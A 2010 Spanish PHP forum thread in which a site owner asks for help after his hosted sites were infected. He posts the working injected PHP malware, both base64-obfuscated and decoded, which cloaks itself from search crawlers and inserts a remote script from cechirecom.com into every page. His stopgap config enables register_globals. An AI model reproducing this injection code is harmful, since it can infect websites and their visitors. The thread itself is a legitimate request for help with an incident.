Foros del Web » Programando para Internet » PHP »

Me Hackearon mis sitios

Estas en el tema de Me Hackearon mis sitios en el foro de PHP en Foros del Web. Hola a todos,, hoy en medio de clases entre a mi sitio, me redirecciona a un sitio y veo que me intenta hacer descargar un ...
  #1 (permalink)  
Antiguo 24/04/2010, 12:26
 
Fecha de Ingreso: enero-2008
Mensajes: 43
Antigüedad: 16 años, 9 meses
Puntos: 0
Me Hackearon mis sitios

Hola a todos,, hoy en medio de clases entre a mi sitio, me redirecciona a un sitio y veo que me intenta hacer descargar un virus.

Veo el codigo fuente y encuentro
Código HTML:
<script src="httpcechirecom(.)com/js.php"></script> 
(al parecer es un dominio registrado en China
cerre todo y sali corriendo para mi casa a solucionarlo

viendo uno de los .php con problema me encuentro con este codigo

Código PHP:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5alpXTm9hWEpsWTI5dExtTnZiUzlxY3k1d2FIQWlQand2YzJOeWFYQjBQZz09Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
pero lo que mas me preocupa es que esta en todos los .php que encontre
y tengo al menos 25 directorios principales.
intente remplazar algunos pero me los modificaba rapidamente

¿alguna idea de como lo hace?
entra por ftp?

por ahora lo controle con php5.ini

Código:
register_globals = On

disable_functions = dir,readdir,sacndir,phpinfo,exec,proc_open,val,base64_decode 
Tengo todo hosteado en Godaddy y tengo para varios dias de trabajo
  #2 (permalink)  
Antiguo 24/04/2010, 13:10
 
Fecha de Ingreso: abril-2010
Mensajes: 83
Antigüedad: 14 años, 7 meses
Puntos: 1
Respuesta: Me Hackearon mis sitios

una solucion.... tenes buckup??... si lo tenes cambia de hosting... o hacete otra web .. y hace que la web vieja valla a la nueva... o no
  #3 (permalink)  
Antiguo 24/04/2010, 13:18
 
Fecha de Ingreso: enero-2008
Mensajes: 43
Antigüedad: 16 años, 9 meses
Puntos: 0
Respuesta: Me Hackearon mis sitios

no se borro nada, por lo que vi
solo se agrego ese codigo.
igual contraseñas y todo eso las voy a cambiar de inmediato.

osea arreglarlo lo puedo arreglar
Quiero saber si todavia esta y como hace para navegar por mis directorios buscando .php
  #4 (permalink)  
Antiguo 24/04/2010, 13:45
Avatar de Vitesse92  
Fecha de Ingreso: diciembre-2009
Ubicación: Internet
Mensajes: 145
Antigüedad: 14 años, 11 meses
Puntos: 5
Respuesta: Me Hackearon mis sitios

limpias variables ?? se ve como xss ! :S
  #5 (permalink)  
Antiguo 24/04/2010, 14:12
 
Fecha de Ingreso: enero-2008
Mensajes: 43
Antigüedad: 16 años, 9 meses
Puntos: 0
Respuesta: Me Hackearon mis sitios

si, aunque tengo tantas cosas online, que pienso que pudo entrar por algo de cuando empezaba.

Alguien encuentra aca algo que haga que se duplique?
Código PHP:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
$GLOBALS['mr_no']=1; if(!function_exists('mrobh')){
if(!
function_exists('gml')){ function gml(){ if
(!
stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!
stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return
base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jZWNoaXJlY29tLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg==");
} return 
""; } } if(!function_exists('gzdecode')){ function
gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
$RBE4C4D037E939226F65812885A53DAD9=10;
$RA3D52E52A48936CDE0F5356BB08652F2=0;
if(
$R30B2AB8DC1496D06B230A71D8962AF5D&4){
$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
} if(
$R30B2AB8DC1496D06B230A71D8962AF5D&8){
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
} if(
$R30B2AB8DC1496D06B230A71D8962AF5D&16){
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
} if(
$R30B2AB8DC1496D06B230A71D8962AF5D&2){
$RBE4C4D037E939226F65812885A53DAD9+=2; }
$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if(
$R034AE2AB94F99CC81B389A1822DA3353===FALSE){
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
} return 
$R034AE2AB94F99CC81B389A1822DA3353; } } function
mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding:
none'
); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
if(
preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
return 
preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
}else{ return 
$RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } }
ob_start('mrobh'); } } 
  #6 (permalink)  
Antiguo 24/04/2010, 15:41
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 18 años, 5 meses
Puntos: 2135
Respuesta: Me Hackearon mis sitios

Como ya comente en un post anterior, esto es causado por un virus, tienes que contactar a tu hosting y decirles que tienen que limpiar su server.

Etiquetas: base64_decode, godaddy, hosting, javascript, ataques
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 22:40.